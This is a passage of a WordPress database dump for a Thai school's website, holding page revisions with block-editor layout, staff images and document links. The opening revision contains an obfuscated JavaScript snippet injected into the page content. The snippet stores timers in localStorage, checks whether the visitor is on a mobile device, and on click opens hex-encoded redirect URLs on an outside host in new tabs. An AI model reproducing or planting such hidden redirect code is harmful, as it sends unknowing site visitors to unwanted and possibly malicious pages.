_0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:28:18','2025-06-27 08:28:18','',19,'http://watprato.ssk.in.th/?p=575',0,'revision','',0),
(577,1,'2025-06-27 15:30:08','2025-06-27 08:30:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c44218-61\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c44218-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รางวัล</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"<img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} 